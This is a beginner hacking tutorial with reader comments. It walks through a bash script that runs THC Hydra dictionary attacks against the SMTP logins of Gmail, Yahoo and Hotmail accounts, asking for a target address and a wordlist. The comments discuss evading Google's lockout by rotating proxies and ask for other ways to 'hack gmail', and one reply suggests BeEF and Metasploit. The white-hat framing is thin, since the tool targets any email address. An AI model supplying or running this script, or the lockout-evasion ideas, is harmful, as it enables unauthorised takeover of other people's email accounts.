How To: Brute-Force Email Using a Simple Bash Script (Ft. THC Hydra)

Brute-Force Email Using a Simple Bash Script (Ft. THC Hydra)

How to Brute-Force Email Using a Simple Bash Script (Ft. THC Hydra)

Hi, my name is Alan, and I am not a script kiddy brat from Xbox Live asking you how to boot someone offline for being mean to me. I am an amateur white hat hacker hoping to learn and teach and this is my first tutorial.

THC Hydra is very prominent online brute-force tool and has been featured in Null-Byte quite a lot. It is dictionary based, as you will have to provide a wordlist with possible passwords. You can read the README here: https://github.com/vanhauser-thc/thc-hydra

Today ,we will be focusing on brute forcing email, or more specifically, SMTP, also known as the Simple Mail Transfer Protocol. It is your standard protocol for sending electronic mail.

Let's get started!

Step 1: Open Up Kali!

Of course, we will be using Kali Linux. I use mine on VMware Workstation, but it won't really matter what you use.

Let's open up Leafpad, or your text editing program of your choice.

Step 2: Bash Time!

We're going to write a little bit of script, so that we can save some time instead of going through the hassle of actually typing out parameters.

On Leafpad, type:
#! /bin/bash

echo Simple Email Cracking Script in bash
echo Written By: Alan Cao
echo NOTE: Make sure you have wordlists!
echo Let us Begin:
echo Choose a SMTP service: Gmail = smtp.gmail.com / Yahoo = smtp.mail.yahoo.com / Hotmail = smtp.live.com /:
read smtp
echo Enter Email Address:
read email
echo Provide Directory of Wordlist for Passwords:
read wordlist

hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp

And after you got it, save it as anything you want, but with .sh at the end. Make sure it is in the root directory. Not on your desktop, but in /root.

Now, I am going to explain how the script works.
#! /bin/bash simply means that everything is in bash.

echo simply means to tell the computer to say something. For example, echo Hello World means to tell the computer to output Hello World.

read is asking for user input. this will then store your input into a variable. read email would mean for you to enter something, and it will be stored into the email.

hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp is the THC Hydra command which will help brute-force the email address. As you may tell, there are some parameters with a $. This is the variable with stored values you previously input in the read command.

Step 3: Permissions

We're not done yet! The file you have saved (in root, right?) only has read and write permissions. This means you cannot execute it.

Let's open up Terminal. Type in
chmod a+x yourscript.sh (ofc replace yourscript with the name you actually gave to the bash file)

Step 4: Execute!

Now we can finally use it!

In terminal, let's type
./yourscript.sh

It's working!

The script is self-explanatory. Type in the SMTP service of the target's email, where smtp.gmail.com is Gmail. After that, you provide the gmail account, such as johndoe@gmail.com and give a wordlist directory, which you can find some default ones in the /usr/share/wordlists directory, or you can create your own with Crunch or CUPP. https://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-passwords-part-4-creating-custom-wordlist-with-crunch-0156817/

Thanks for reading, and please provide some feedback. Ofc, this is my first How-to...

32 Comments

Good job, Alan.

Have you tested it successfully against gmail?

I have tested it quite a few times, with email accounts of my (consenting) family members. At times, I received messages stating that there has been an error and that there could not be a connection made to port 465 on smtp.gmail.com. Other times, they successfully work

Also, THC-Hydra requires that you provide it with the failure message/string. Have you included it here?

Wouldn't Google block your IP when you do so many requests?

Yes, usually after 150 failed attemps.

Does this work, then?

Btw, it's not a brute force if you use a dictionary...

Yes, if you have a 150-word or less dictionary.

i'm going to improve this script by letting it bounce around proxies every 150 attempts. it might take time because right now i can't focus on hacking because of my finals (which is why i haven't put up part 10 of my series on C++ yet).

Well done. +1

Maybe work on adding form parameters next.

Very nice and very well explained.

When I enter the password.txt file THAT I SAVED IN ROOT i get "PERMISSION DENIED" anyone know why?

When you saved the password list, you must give yourself permissions to use it.

Thank you. I gave permission and got it too work but it went right past the real password (I tried it on my own gmail). It was super fast though. I noticed there is no denial string. Has anyone else had this problem?

It says that 1 valid password found. But how do I know what the actual password among the words in the wordlist is?.

Does anyone know a better way to hack gmail without use of password lists or tamper data

There are many ways. You can hook the browser with BeEF or exploit the system with Metasploit.

Spend some time on Null Byte and you will find many ways.

Hi, I'm pretty new at this, when I try to run the script nothing happens, also if i try to run hydra command line outside of bash script it thinks its a non existent directory, any ideas?

i am indeed

OK. Can you attach a screenshot of your command?

it pauses for a few seconds then returns back to a new line

like this?

root@kali:~# cd /media/root/save
root@kali:/media/root/save# ./email.sh
root@kali:/media/root/save#

I'm running Kali from a live usb but i don't think that would make a difference

I need more info. The script and a screenshot of your system when you run it.

Deleted

Using hydra command, it wasn't able to find match the password to the username even though it was in there. I'm pretty sure it was because I was running 32 threads. So I just set threads at 4 to see what happens.

i tried and it says unknown smtp.gmail.com can anyone help me rectify the problem

now google have added new security feature that notifies when somone attack. i tried my simple python cracker on my email but it failed.

can anyone tell me how to add proxy to this script so that ip changes randomly from an given list?sorry iam new to pythonand might silly questions

thanks in advance

i was wondering if there was anyway to crack online directly, without plishing or bruteforcing or using any passwordlist

hey guys, i run that command to hack my own gmail account but at the end i got "0 valid password" and i had intentionally included my password in my word list. is there anything am not getting clear? thank you

so i obviously tested it out on my own email and it came back with a false positive?
the "valid" password was not correct ?
any ideas

Share Your Thoughts

  • Hot
  • Latest